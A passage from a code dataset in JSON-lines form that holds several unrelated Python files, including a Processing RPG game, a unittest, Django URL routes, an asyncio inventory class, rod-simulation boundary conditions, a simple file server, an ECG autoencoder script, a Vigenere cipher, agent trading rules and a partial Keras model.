32)\n else:\n fill(180)\n rect(800, 222, 75, 32)\n if((currChar[5]) != 5 and points > 0):\n fill(255)\n rect(800, 272, 75, 32)\n else:\n fill(180)\n rect(800, 272, 75, 32)\n if((currChar[2]) != 5 and points > 0):\n fill(255)\n rect(800, 322, 75, 32)\n else:\n fill(180)\n rect(800, 322, 75, 32)\n if((currChar[3]) != 5 and points > 0):\n fill(255)\n rect(800, 372, 75, 32)\n else:\n fill(180)\n rect(800, 372, 75, 32) \n \n if(points == 0):\n fill(255)\n rect(400, 500, 475, 100)\n else:\n fill(180)\n rect(400, 500, 475, 100)\n drawText()\n \ndef mousePressed():\n global state\n if state == 0: #title screen\n if mousePressed and 350 < mouseX < 1150 and 350 < mouseY < 500:\n fill(230)\n background(139,0,0)\n state = 50\n setup50()\n if mousePressed and 350 < mouseX < 1150 and 575 < mouseY < 725:\n exit()\n if state == 1: #character selection\n global players\n global war\n global wiz\n global rog\n global ran\n global pal\n global mon\n global warl\n global sai\n \n if mousePressed and 40 < mouseX < 270 and 40 < mouseY < 340 and war == False:\n fill(150)\n players +=1\n war = True\n charList.append((\"Warrior\",25,5,2,2,1))\n elif war == True:\n fill(150)\n else:\n fill(255)\n rect(40,40,233,300)\n if mousePressed and 293 < mouseX < 526 and 40 < mouseY < 340 and wiz == False:\n fill(150)\n players +=1\n wiz = True\n charList.append((\"Wizard\", 10,2,3,3,5))\n elif wiz == True:\n fill(150)\n else:\n fill(255)\n rect(293,40,233,300)\n if mousePressed and 546 < mouseX < 779 and 40 < mouseY < 340 and rog == False:\n fill(150)\n players +=1\n rog = True\n charList.append((\"Rogue\", 15,2,3,5,2))\n elif rog == True:\n fill(150)\n else:\n fill(255)\n rect(546,40,233,300)\n if mousePressed and 799 < mouseX < 1032 and 40 < 
mouseY < 340 and ran == False:\n fill(150)\n players +=1\n ran = True\n charList.append((\"Ranger\", 15,1,5,4,2))\n elif ran == True:\n fill(150)\n else:\n fill(255)\n rect(799,40,233,300)\n if mousePressed and 40 < mouseX < 270 and 360 < mouseY < 660 and pal == False:\n fill(150)\n players +=1\n pal = True\n charList.append((\"Paladin\", 20,4,1,2,4))\n elif pal == True:\n fill(150)\n else:\n fill(255)\n rect(40,360,233,300)\n if mousePressed and 293 < mouseX < 526 and 360 < mouseY < 660 and mon == False:\n fill(150)\n players +=1\n mon = True\n charList.append((\"Monk\", 15,2,4,4,2))\n elif mon == True:\n fill(150)\n else:\n fill(255)\n rect(293,360,233,300)\n if mousePressed and 546 < mouseX < 779 and 360 < mouseY < 660 and warl == False:\n fill(150)\n players +=1\n warl = True\n charList.append((\"Warlock\", 15,2,2,3,5))\n elif warl == True:\n fill(150)\n else:\n fill(255)\n rect(546,360,233,300)\n if mousePressed and 799 < mouseX < 1032 and 360 < mouseY < 660 and sai == False:\n fill(150)\n players +=1\n sai = True\n charList.append((\"Saint\", 15,1,3,3,5))\n elif sai == True:\n fill(150)\n else:\n fill(255)\n rect(799,360,233,300)\n if players < 2:\n fill(150)\n elif mousePressed and 1150 < mouseX < 1350 and 560 < mouseY < 660 and players >= 2:\n fill(230)\n state +=1\n background(139,0,0)\n setup3()\n else:\n fill(255)\n rect(1150,560,200,100)\n printText()\n elif state == 2: #stat distributor\n global currChar\n global points\n global finalChars\n global charInList\n classname = currChar[0]\n HP = currChar[1]\n strength = currChar[2]\n dex = currChar[3]\n agi = currChar[4]\n intl = currChar[5]\n if mousePressed and 700 < mouseX < 775 and 222 < mouseY < 254 and agi != bagi:\n agi -= 1\n points +=1\n if mousePressed and 800 < mouseX < 875 and 222 < mouseY < 254 and agi != 5 and points > 0:\n agi += 1\n points -=1\n if mousePressed and 700 < mouseX < 775 and 272 < mouseY < 304 and intl != bint:\n intl -= 1\n points +=1\n if mousePressed and 800 < mouseX < 875 and 272 < mouseY < 304 and intl != 5 and points > 0:\n intl += 1\n points -=1\n if mousePressed and 700 < mouseX < 775 and 322 < mouseY < 354 and strength != bstr:\n strength -= 1\n points +=1\n if mousePressed and 800 < mouseX < 875 and 322 < mouseY < 354 and strength !=5 and points > 0:\n strength += 1\n points -=1\n if mousePressed and 700 < mouseX < 775 and 372 < mouseY < 404 and dex != bdex:\n dex -= 1\n points +=1\n if mousePressed and 800 < mouseX < 875 and 372 < mouseY < 404 and dex != 5 and points > 0:\n dex += 1\n points -=1\n currChar = (classname,HP,strength,dex,agi,intl)\n if mousePressed and 400 < mouseX < 875 and 500 < mouseY < 600 and points == 0:\n finalChars.append(currChar)\n if charInList < len(charList) - 1:\n charInList += 1\n setBases(charInList)\n points = 2\n else:\n print(finalChars)\n state += 1\n if state == 50: #letter screen\n if mousePressed and 1150 < mouseX < 1350 and 560 < mouseY < 660:\n fill(255)\n state = 1\n background(139,0,0)\n setup2()\n\ndef draw():\n global state\n if state == 0:\n return 0\n if state == 1:\n global players\n charHover()\n elif state == 2:\n global charInList\n drawCharacter(charInList)\n drawButtons(charInList)\n elif state == 3:\n background(139,0,0)\n elif state == 50:\n return 0\n \n \n \n \n","sub_path":"WorldsEnd/WorldsEnd.pyde","file_name":"WorldsEnd.pyde","file_ext":"pyde","file_size_in_byte":17614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"184225919","text":"import unittest\nimport subprocess\nfrom 
odybcl2fastq import config\nimport shutil\nimport os\n\n\ndef run_cmd(cmd):\n # run unix cmd, return out and error\n proc = subprocess.Popen(cmd, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n out, err = proc.communicate()\n return (proc.returncode, out, err)\n\n\ndef resetDirs(dirs):\n for d in dirs:\n try:\n shutil.rmtree(config[d])\n os.makedirs(config[d])\n except Exception:\n pass\n\n\nclass LoadRunsTest(unittest.TestCase):\n\n def setUp(self):\n resetDirs(['SOURCE_DIR', 'OUTPUT_DIR', 'FINAL_DIR'])\n\n def tearDown(self):\n resetDirs(['SOURCE_DIR', 'OUTPUT_DIR', 'FINAL_DIR'])\n\n def testLogging(self):\n '''\n load_runs_tests: Make sure that log file specification works, either absolute path or relative path\n '''\n logfile = '/tmp/log'\n cmd = 'LOAD_RUNS_LOG_FILE=%s load_runs --no-daemon' % logfile\n code, out, err = run_cmd(cmd)\n self.assertTrue(code == 0, 'Error running command %s, %s' % (cmd, err))\n logsdata = open(logfile, 'r').read()\n self.assertTrue('Found 0 need_to_process runs' in logsdata, 'Incorrect output: %s' % logsdata)\n self.assertTrue('Found 0 run_is_incomplete runs' in logsdata, 'Incorrect output: %s' % logsdata)\n","sub_path":"test/load_runs_tests.py","file_name":"load_runs_tests.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"262482916","text":"from django.conf.urls import url\n\nfrom . import views\n\napp_name = 'zmBlog'\nurlpatterns = [\n # ex: /zmBlog/\n url(r'^$', views.IndexView.as_view(), name='index'),\n # ex: /zmBlog/create/\n url(r'^create/$', views.CreateView.as_view(), name='create'), \n # ex: /zmBlog/5/\n url(r'^(?P[0-9]+)/$', views.DetailView.as_view(), name='detail'),\n # ex: /zmBlog/5/like/\n url(r'^(?P[0-9]+)/like/$', views.like, name='like'),\n # ex: /zmBlog/5/change/\n # url(r'^(?P[0-9]+)/change/$', views.change, name='change'), \n]","sub_path":"zmBlog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"502613508","text":"import asyncio\nimport random\n\n\nclass Inventory:\n def __init__(self):\n self.catalogue = {\n \"Burgers\": [\n {\"id\": 1, \"name\": \"Python Burger\", \"price\": 5.99},\n {\"id\": 2, \"name\": \"C Burger\", \"price\": 4.99},\n {\"id\": 3, \"name\": \"Ruby Burger\", \"price\": 6.49},\n {\"id\": 4, \"name\": \"Go Burger\", \"price\": 5.99},\n {\"id\": 5, \"name\": \"C++ Burger\", \"price\": 7.99},\n {\"id\": 6, \"name\": \"Java Burger\", \"price\": 7.99}\n ],\n \"Sides\": {\n \"Fries\": [\n {\"id\": 7, \"size\": \"Small\", \"price\": 2.49}, \n {\"id\": 8, \"size\": \"Medium\", \"price\": 3.49}, \n {\"id\": 9, \"size\": \"Large\", \"price\": 4.29}\n ],\n \"Caesar Salad\": [\n {\"id\": 10, \"size\": \"Small\", \"price\": 3.49}, \n {\"id\": 11, \"size\": \"Large\", \"price\": 4.49}\n ]\n },\n \"Drinks\": {\n \"Coke\": [\n {\"id\": 12, \"size\": \"Small\", \"price\": 1.99}, \n {\"id\": 13, \"size\": \"Medium\", \"price\": 2.49}, \n {\"id\": 14, \"size\": \"Large\", \"price\": 2.99}\n ],\n \"Ginger Ale\": [\n {\"id\": 15, \"size\": \"Small\", \"price\": 1.99}, \n {\"id\": 16, \"size\": \"Medium\", \"price\": 2.49}, \n {\"id\": 17, \"size\": \"Large\", \"price\": 2.99}\n ],\n \"Chocolate Milk Shake\": [\n {\"id\": 18, \"size\": \"Small\", \"price\": 3.99}, \n {\"id\": 19, \"size\": \"Medium\", \"price\": 4.49}, \n {\"id\": 20, \"size\": \"Large\", \"price\": 4.99}\n ]\n }\n }\n 
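The run_cmd helper in the test/load_runs_tests.py record above drives subprocess.Popen and communicate() by hand. On Python 3.7+ the same contract, a (returncode, stdout, stderr) tuple with shell=True semantics, can be had from subprocess.run; a sketch under that assumption:

```python
import subprocess

def run_cmd(cmd):
    # Same contract as the record's Popen-based helper: returns
    # (returncode, stdout, stderr) as bytes, with shell=True preserved.
    # capture_output=True (Python 3.7+) wires up both pipes.
    proc = subprocess.run(cmd, shell=True, capture_output=True)
    return proc.returncode, proc.stdout, proc.stderr

code, out, err = run_cmd("echo hello")
assert code == 0 and out.strip() == b"hello"
```

Because capture_output is just shorthand for setting both stdout and stderr to PIPE, the tuple comes back as bytes exactly as in the record's version.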
self._generate_item_lookup_dict()\n self.stock = {i + 1: random.randint(0,15) for i in range(len(self.items))}\n self.stock_lock = asyncio.Lock()\n\n def _generate_item_lookup_dict(self):\n self.items = {}\n for category in self.catalogue:\n category_collection = self.catalogue[category]\n\n if isinstance(category_collection, list):\n for item in category_collection:\n new_item = item.copy()\n new_item[\"category\"] = category\n new_item[\"subcategory\"] = None\n self.items[new_item[\"id\"]] = new_item\n else:\n for subcategory in category_collection:\n for item in category_collection[subcategory]:\n new_item = item.copy()\n new_item[\"category\"] = category\n new_item[\"subcategory\"] = subcategory\n self.items[new_item[\"id\"]] = new_item\n\n def _verify_item_id(func):\n async def wrapper(self, item_id):\n if item_id not in self.stock:\n raise ValueError(f\"No item with id: {item_id} exists in the inventory.\")\n \n result = await func(self, item_id)\n return result\n \n return wrapper\n\n async def get_number_of_items(self):\n await asyncio.sleep(1)\n return len(self.items)\n \n async def get_catalogue(self):\n await asyncio.sleep(2)\n return self.catalogue\n\n @_verify_item_id\n async def get_stock(self, item_id):\n if item_id not in self.stock:\n raise ValueError(f\"No item with id: {item_id} exists in the inventory.\")\n await asyncio.sleep(2)\n\n async with self.stock_lock:\n return self.stock[item_id]\n\n @_verify_item_id\n async def decrement_stock(self, item_id):\n if item_id not in self.stock:\n raise ValueError(f\"No item with id: {item_id} exists in the inventory.\")\n\n if self.stock[item_id] == 0:\n return False\n \n async with self.stock_lock:\n self.stock[item_id] -= 1\n return True\n\n @_verify_item_id\n async def get_item(self, item_id):\n await asyncio.sleep(1)\n return self.items[item_id]","sub_path":"inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"322286362","text":"__doc__ = \"\"\" Numpy implementation module for boundary condition implementations that constrain or\ndefine displacement conditions on the rod\"\"\"\n__all__ = [\"FreeRod\", \"OneEndFixedRod\", \"HelicalBucklingBC\"]\nimport numpy as np\nfrom elastica._rotations import _get_rotation_matrix\n\n\nclass FreeRod:\n \"\"\"\n This is the base class for displacement boundary conditions. It applies no constraints or displacements to the rod.\n\n Note\n ----\n Every new displacement boundary condition class must be\n derived from FreeRod class.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Free rod has no input parameters.\n \"\"\"\n pass\n\n def constrain_values(self, rod, time):\n \"\"\"\n Constrain values (position and/or directors) of a rod object.\n\n In FreeRod class, this routine simply passes.\n\n Parameters\n ----------\n rod : object\n Rod-like object.\n time : float\n The time of simulation.\n\n Returns\n -------\n\n \"\"\"\n pass\n\n def constrain_rates(self, rod, time):\n \"\"\"\n Constrain rates (velocity and/or omega) of a rod object.\n\n In FreeRod class, this routine simply passes.\n\n Parameters\n ----------\n rod : object\n Rod-like object.\n time : float\n The time of simulation.\n\n Returns\n -------\n\n \"\"\"\n pass\n\n\nclass OneEndFixedRod(FreeRod):\n \"\"\"\n This boundary condition class fixes one end of the rod. 
Currently,\n this boundary condition fixes position and directors\n at the first node and first element of the rod.\n\n Attributes\n ----------\n fixed_positions : numpy.ndarray\n 2D (dim, 1) array containing data with 'float' type.\n fixed_directors : numpy.ndarray\n 3D (dim, dim, 1) array containing data with 'float' type.\n \"\"\"\n\n def __init__(self, fixed_position, fixed_directors):\n \"\"\"\n\n Parameters\n ----------\n fixed_position : numpy.ndarray\n 2D (dim, 1) array containing data with 'float' type.\n fixed_directors : numpy.ndarray\n 3D (dim, dim, 1) array containing data with 'float' type.\n \"\"\"\n FreeRod.__init__(self)\n self.fixed_position = fixed_position\n self.fixed_directors = fixed_directors\n\n def constrain_values(self, rod, time):\n rod.position_collection[..., 0] = self.fixed_position\n rod.director_collection[..., 0] = self.fixed_directors\n\n def constrain_rates(self, rod, time):\n rod.velocity_collection[..., 0] = 0.0\n rod.omega_collection[..., 0] = 0.0\n\n\nclass HelicalBucklingBC(FreeRod):\n \"\"\"\n This is the boundary condition class for Helical\n Buckling case in Gazzola et. al. RSoS (2018).\n The applied boundary condition is twist and slack on to\n the first and last nodes and elements of the rod.\n\n Attributes\n ----------\n twisting_time: float\n Time to complete twist.\n final_start_position: numpy.ndarray\n 2D (dim, 1) array containing data with 'float' type.\n Position of first node of rod after twist completed.\n final_end_position: numpy.ndarray\n 2D (dim, 1) array containing data with 'float' type.\n Position of last node of rod after twist completed.\n ang_vel: numpy.ndarray\n 2D (dim, 1) array containing data with 'float' type.\n Angular velocity of rod during twisting time.\n shrink_vel: numpy.ndarray\n 2D (dim, 1) array containing data with 'float' type.\n Shrink velocity of rod during twisting time.\n final_start_directors: numpy.ndarray\n 3D (dim, dim, blocksize) array containing data with 'float' type.\n Directors of first element of rod after twist completed.\n final_end_directors: numpy.ndarray\n 3D (dim, dim, blocksize) array containing data with 'float' type.\n Directors of last element of rod after twist completed.\n\n\n \"\"\"\n\n def __init__(\n self,\n position_start,\n position_end,\n director_start,\n director_end,\n twisting_time,\n slack,\n number_of_rotations,\n ):\n \"\"\"\n\n Parameters\n ----------\n\n position_start : numpy.ndarray\n 2D (dim, 1) array containing data with 'float' type.\n Initial position of first node.\n position_end : numpy.ndarray\n 2D (dim, 1) array containing data with 'float' type.\n Initial position of last node.\n director_start : numpy.ndarray\n 3D (dim, dim, blocksize) array containing data with 'float' type.\n Initial director of first element.\n director_end : numpy.ndarray\n 3D (dim, dim, blocksize) array containing data with 'float' type.\n Initial director of last element.\n twisting_time : float\n Time to complete twist.\n slack : float\n Slack applied to rod.\n number_of_rotations : float\n Number of rotations applied to rod.\n \"\"\"\n FreeRod.__init__(self)\n self.twisting_time = twisting_time\n\n angel_vel_scalar = (\n 2.0 * number_of_rotations * np.pi / self.twisting_time\n ) / 2.0\n shrink_vel_scalar = slack / (self.twisting_time * 2.0)\n\n direction = (position_end - position_start) / np.linalg.norm(\n position_end - position_start\n )\n\n self.final_start_position = position_start + slack / 2.0 * direction\n self.final_end_position = position_end - slack / 2.0 * direction\n\n 
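Both OneEndFixedRod above and the HelicalBucklingBC being defined here reduce their constraints to the same numpy idiom: ellipsis indexing, where arr[..., 0] selects the first node or element across all leading axes. A toy demonstration with invented shapes (3 spatial dimensions, 5 nodes):

```python
import numpy as np

# Toy stand-ins for a rod's state: 3 spatial dims x 5 nodes.
position_collection = np.random.rand(3, 5)
velocity_collection = np.random.rand(3, 5)
fixed_position = np.zeros(3)

# The same moves OneEndFixedRod makes in constrain_values/constrain_rates:
position_collection[..., 0] = fixed_position  # pin the first node
velocity_collection[..., 0] = 0.0             # and freeze its rate

assert np.allclose(position_collection[:, 0], fixed_position)
assert np.allclose(velocity_collection[:, 0], 0.0)
```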
self.ang_vel = angel_vel_scalar * direction\n self.shrink_vel = shrink_vel_scalar * direction\n\n theta = number_of_rotations * np.pi\n\n self.final_start_directors = (\n _get_rotation_matrix(theta, direction.reshape(3, 1)).reshape(3, 3)\n @ director_start\n ) # rotation_matrix wants vectors 3,1\n self.final_end_directors = (\n _get_rotation_matrix(-theta, direction.reshape(3, 1)).reshape(3, 3)\n @ director_end\n ) # rotation_matrix wants vectors 3,1\n\n def constrain_values(self, rod, time):\n if time > self.twisting_time:\n rod.position_collection[..., 0] = self.final_start_position\n rod.position_collection[..., -1] = self.final_end_position\n\n rod.director_collection[..., 0] = self.final_start_directors\n rod.director_collection[..., -1] = self.final_end_directors\n\n def constrain_rates(self, rod, time):\n if time > self.twisting_time:\n rod.velocity_collection[..., 0] = 0.0\n rod.omega_collection[..., 0] = 0.0\n\n rod.velocity_collection[..., -1] = 0.0\n rod.omega_collection[..., -1] = 0.0\n\n else:\n rod.velocity_collection[..., 0] = self.shrink_vel\n rod.omega_collection[..., 0] = self.ang_vel\n\n rod.velocity_collection[..., -1] = -self.shrink_vel\n rod.omega_collection[..., -1] = -self.ang_vel\n","sub_path":"elastica/_elastica_numpy/_boundary_conditions.py","file_name":"_boundary_conditions.py","file_ext":"py","file_size_in_byte":7120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"1841519","text":"#!/usr/bin/python\n# coding:utf-8\n\nimport http.server\nimport socketserver\n\nPORT = 8081\n\ndef run_file_server():\n Handler = http.server.SimpleHTTPRequestHandler\n with socketserver.TCPServer((\"\", PORT), Handler) as httpd:\n print(\"serving at port\", PORT)\n httpd.serve_forever()\n\n\nif __name__ == '__main__':\n run_file_server()\n exit(1)\n","sub_path":"py3/smart_car/smart_server/file_server.py.py","file_name":"file_server.py.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"314520586","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport numpy as np\nfrom datasheet import AE_Input_train, AE_Input_test, AE_Label\nimport matplotlib.pyplot as plt\n\n# Load test variable and trained parameters\nencoder = torch.load('/Users/WoochanH/python/ecgproject/main/trainedparams/sae_encoder_MSE_5000_Tanh_pretrain.pt')\ndecoder = torch.load('/Users/WoochanH/python/ecgproject/main/trainedparams/sae_decoder_MSE_5000_Tanh_pretrain.pt')\nTensor_trainset = Variable(torch.from_numpy(AE_Input_train).float())\nTensor_testset = Variable(torch.from_numpy(AE_Input_test).float())\nTensor_label = Variable(torch.from_numpy(AE_Label).float())\n\nkey = int(input(\"Will you test on testset(1) or trainset(2)?: \"))\nbatch = int(input(\"Which batch will you plot?: \"))\n\nif key == 1:\n Input_tensor = Tensor_testset\n dirty = np.reshape(AE_Input_test, (2400,270))\n dirtyarray = dirty[batch]\nelif key == 2:\n Input_tensor = Tensor_trainset\n dirty = np.reshape(AE_Input_train, (43200, 270))\n dirtyarray = dirty[batch]\nelse:\n print(\"Invalid input\")\n\n# Run Model on Input data\nEn1 = encoder(Input_tensor)\nDe1 = decoder(En1)\nEn2 = encoder(De1)\nDe2 = decoder(En2)\n\n\n# Reshape into numpy array\ndenoised = De2.data[batch]\ndenoisedarray = denoised.numpy()\n\n\n# Plot to compare\nplt.figure(figsize = (10,4))\nplt.plot(denoisedarray, color='blue', linewidth=0.2, linestyle='-', label = 'Denoised');\nplt.plot(dirtyarray, color='k', linewidth=0.4, linestyle='-', label = 
'Noisy');\nplt.legend(loc = 2);\nplt.title(\"Comparison between original and denoised\");\n\nplt.show()\n'''\n# Plot Loss over EPOCH\ntrain_loss = np.load('/Users/WoochanH/python/ecgproject/main/sae_train_loss.npz')\nplt.figure(figsize = (10,4))\nplt.plot(train_loss, color='k', linewidth=0.4, linestyle='-', label = 'MSE loss');\nplt.legend(loc = 2);\nplt.title(\"Loss over Epoch\");\n\nplt.show()\n'''\n","sub_path":"autoencoder/testaeecg.py","file_name":"testaeecg.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"242454415","text":"#A more difficult variation of the lovely caesar where Key is now a word\n#Note: Key does not consider spaces or special characters, keeps changing regardless\n#Last Edited: 11/24/17\n#Status: Complete\n\n#Import sys for command-line arguments and interpretation in one line\nimport sys\n\ndef main():\n #Confirm key is present:\n try:\n arg1 = sys.argv[1]\n except IndexError:\n print (\"Usage: \")\n return 1\n #Confirm key is consistent of only letters:\n for x in arg1:\n if x.isalpha():\n continue\n else:\n print(\"Key must be composed of letters.\")\n return 1.5\n\n #Now that key works, ask for the phrase\n phrase = input(\"Enter the phrase you mean to cipher:\")\n #calling cipher function\n cipher(phrase, sys.argv[1])\n\ndef cipher(phrase, key):\n #Assuming key has already passed previous parameters,\n #convert the letter into a number and change the\n #phrase according to the current key.\n y = 0 #Counter to be able to change the key\n for x in phrase:\n #Formula that changes the key;it's off by one/does not work\n keyLoop = key[y % len(key)]\n if keyLoop.isupper():\n newKey = (ord(keyLoop) + 1) - ord('A')\n y += 1\n elif keyLoop.islower():\n newKey = (ord(keyLoop) + 1) - ord('a')\n y += 1\n############################################################################\n #Encoding the phrase with the new key\n if x.isalpha():\n if x.isupper():\n newPhrase = ((ord(x) - ord('A') + newKey) % 26) + ord('A')\n elif x.islower():\n newPhrase = ((ord(x) - ord('a') + newKey) % 26) + ord('a')\n\n newPhrase = str(chr(newPhrase)) #Converting back to ASCII Character\n sys.stdout.write(newPhrase)\n\n else:\n sys.stdout.write(x) #printing if it's not a character\n sys.stdout.write('\\n') #printing new line\n\n\n#Read code and confirm command line argument\nif __name__ == \"__main__\":\n main()","sub_path":"python/vigenere.py","file_name":"vigenere.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"144694241","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jan 4 05:41:06 2019\r\n\r\n@author: ymamo\r\n\"\"\"\r\n\r\nfrom random import randint\r\nfrom scipy.stats.mstats import gmean\r\nfrom itertools import combinations\r\nimport functools\r\n#from ML_Mesa import MetaAgent\r\n\r\nclass rules(): \r\n \r\n def __init__(self): \r\n self.metabolism = None\r\n #Data set up = {1 : Sugar Value, 2 : Spice Value}\r\n self.accumulations = None\r\n \r\n \r\n def calc_accumulations(self,meta):\r\n \r\n sug_amount = 0\r\n spice_amount = 0\r\n for agent in meta.sub_agents.values(): \r\n if agent.type == 'agent':\r\n sug_amount += agent.accumulations[1.0]\r\n spice_amount += agent.accumulations[2.0]\r\n elif agent.type == 'meta':\r\n sug_amount += agent.policy.accumulations[1.0]\r\n spice_amount += agent.policy.accumulations[2.0]\r\n \r\n \r\n return {1.0: sug_amount, 2.0:spice_amount}\r\n 
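The vigenere.py record above intentionally advances the key on every character ("keeps changing regardless", per its header comment), and its own inline comment flags the +1 in the shift calculation as off by one. For contrast, here is a compact sketch of the textbook variant, which drops the +1 and advances the key only on letters; this is a deliberately different behavior, not a patch to the record:

```python
def vigenere(phrase, key):
    # Textbook Vigenere: shift comes straight from the key letter, and the
    # key index advances only on alphabetic characters (unlike the record).
    out, k = [], 0
    for ch in phrase:
        if ch.isalpha():
            base = ord('A') if ch.isupper() else ord('a')
            shift = ord(key[k % len(key)].lower()) - ord('a')
            out.append(chr((ord(ch) - base + shift) % 26 + base))
            k += 1
        else:
            out.append(ch)  # punctuation and spaces pass through untouched
    return ''.join(out)

print(vigenere("Attack at dawn!", "lemon"))  # -> "Lxfopv ef rnhr!"
```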
\r\n \r\n \r\n def find_trader(self, agent, meta):\r\n '''\r\n Helper Function for self.trade(): \r\n \r\n gets_agents from nearby to trade with\r\n '''\r\n \r\n \r\n traders = []\r\n neighbors = [i for i in agent.model.grid.get_neighborhood(agent.pos, \\\r\n agent.moore, radius = agent.capability['vision'])]\r\n \r\n for n in neighbors: \r\n this_cell = agent.model.grid.get_cell_list_contents([n])\r\n for item in this_cell: \r\n if str(item) == \"Agent\" and item not in meta.sub_agents.values():\r\n traders.append(item) #for intial step 2 agents \r\n #may be on same grid\r\n #based on random selection \r\n return traders\r\n \r\n \r\n def group_trade(self, agent, meta):\r\n \r\n '''\r\n Trade Function \r\n \r\n GrAS p. 105\r\n '''\r\n \r\n agent.assess_welfare()\r\n \r\n traders = self.find_trader(agent, meta)\r\n \r\n if len(traders) > 0: \r\n agent.model.random.shuffle(traders) #randomize who trade with\r\n else: \r\n return\r\n \r\n \r\n for partner in traders: \r\n #trade_benefit = True\r\n #while trade_benefit: \r\n # Per trade formulation, and to prevent divison by zero warning\r\n if agent.MRS == partner.MRS: \r\n pass\r\n \r\n else: \r\n #Calculate Price\r\n price = gmean([agent.MRS, partner.MRS])\r\n \r\n #Draft Trade\r\n if price > 1: \r\n spice = price\r\n sugar = 1\r\n else:\r\n sugar = 1/price\r\n spice = 1\r\n \r\n \r\n \r\n \r\n if agent.MRS > partner.MRS: \r\n conduct = agent.draft_trade(sugar, spice, partner)\r\n if conduct == True: \r\n agent.accumulations[1] += sugar\r\n agent.accumulations[2] -= spice\r\n partner.accumulations[2] += spice\r\n partner.accumulations[1] -= sugar\r\n agent.model.price_record[agent.model.step_num].append(price)\r\n agent.assess_welfare()\r\n partner.assess_welfare()\r\n agent.make_link(partner)\r\n self.accumulations = agent.accumulations\r\n else: \r\n pass\r\n \r\n \r\n else: \r\n conduct = partner.draft_trade(sugar, spice, agent)\r\n if conduct == True:\r\n agent.accumulations[1] -= sugar\r\n agent.accumulations[2] += spice\r\n partner.accumulations[2] -= spice\r\n partner.accumulations[1] += sugar\r\n agent.assess_welfare()\r\n partner.assess_welfare()\r\n agent.model.price_record[agent.model.step_num].append(price)\r\n agent.make_link(partner)\r\n self.accumulations = agent.accumulations\r\n else: \r\n pass\r\n \r\n def sub_step(self, agent, meta): \r\n \r\n \r\n self.accumulations = self.calc_accumulations(meta)\r\n #Save agents situation\r\n agent.accumulations = self.accumulations\r\n agent.move()\r\n agent.collect()\r\n self.accumulations = agent.accumulations\r\n \r\n \r\n def sub_step2(self,agent, meta): \r\n \r\n agent.die()\r\n if agent.status == \"dead\":\r\n return\r\n agent.accumulations = self.accumulations\r\n agent.eat()\r\n self.accumulations = agent.accumulations\r\n \r\n self.group_trade(agent, meta) \r\n \r\n \r\n \r\n def step(self, agent): \r\n '''\r\n Purpose: Replace agent step function with one which follows an \r\n organizational policy of all the agents\r\n \r\n Use recursion to get ensure you get down to granular agent\r\n '''\r\n\r\n meta = agent.model.ml.get_agent_group(agent, 'trades')\r\n \r\n \r\n self.sub_step(agent, meta)\r\n self.sub_step2(agent, meta)\r\n \r\n ","sub_path":"Common Resource- one level/organization.py","file_name":"organization.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"331383438","text":"\r\nfrom keras.utils import np_utils\r\nimport keras.models as models\r\nfrom keras.layers 
import Input,merge, Concatenate\r\nfrom keras.layers.core import Reshape,Dense,Dropout,Activation,Flatten\r\nfrom keras.layers.advanced_activations import LeakyReLU\r\nfrom keras.activations import *\r\nfrom keras.layers.wrappers import TimeDistributed\r\nfrom keras.layers.noise import GaussianNoise\r\nfrom keras.layers.convolutional import Conv1D, MaxPooling1D, ZeroPadding1D, UpSampling1D,Convolution1D\r\nfrom keras.regularizers import *\r\nfrom keras.layers.normalization import BatchNormalization\r\nfrom keras.optimizers import *\r\nfrom keras.datasets import mnist\r\nfrom keras.models import Model\r\nfrom keras.layers import Layer\r\nfrom keras import backend as K\r\nfrom keras.layers import LSTM\r\nimport math;\r\n\r\n\r\n\r\n#Custom loss funciton\r\nclass NormalPDFLogLikelyhoodLayer(Layer):\r\n \r\n def __init__(self, **kwargs):\r\n self.is_placeholder = True\r\n self.scalingFactor = 1./math.sqrt(2*math.pi);\r\n super(NormalPDFLogLikelyhoodLayer, self).__init__(**kwargs) \r\n\r\n def call(self, inputs):\r\n mu = inputs[0];\r\n sigmaSquared = inputs[1];\r\n observation = inputs[2];\r\n \r\n \r\n #self.scalingFactor *\r\n pdfValue = K.exp(-K.square(observation - mu) / (2 * sigmaSquared) ) / K.sqrt(sigmaSquared)\r\n \r\n \r\n logLikelyhood = K.log(1+pdfValue)\r\n # Having some issues with stability\r\n loss = K.exp(-K.mean(logLikelyhood));\r\n \r\n \r\n #logLikelyhood = K.mean(K.log(sigmaSquared)-K.square(observation - mu)/ (2*sigmaSquared));\r\n #loss = logLikelyhood;\r\n self.add_loss(loss, inputs=inputs)\r\n \r\n # Output is not relevant\r\n return inputs;\r\n\r\nclass GeneratorFactory:\r\n def __init__(self, dopt, shp=[25], dropout_rate = 0.25):\r\n self.inputShape = shp;\r\n self.dopt = dopt; \r\n self.dropout_rate = dropout_rate;\r\n \r\n def createLSTM(self, look_back = 10, batch_size = 128):\r\n g_input = Input(shape=self.inputShape, batch_shape = (batch_size,look_back, 1))\r\n H = g_input\r\n H = LSTM(8, batch_input_shape=(batch_size, look_back, 1), stateful=True, return_sequences=True)(H);\r\n H = LSTM(8, batch_input_shape=(batch_size, look_back, 1), 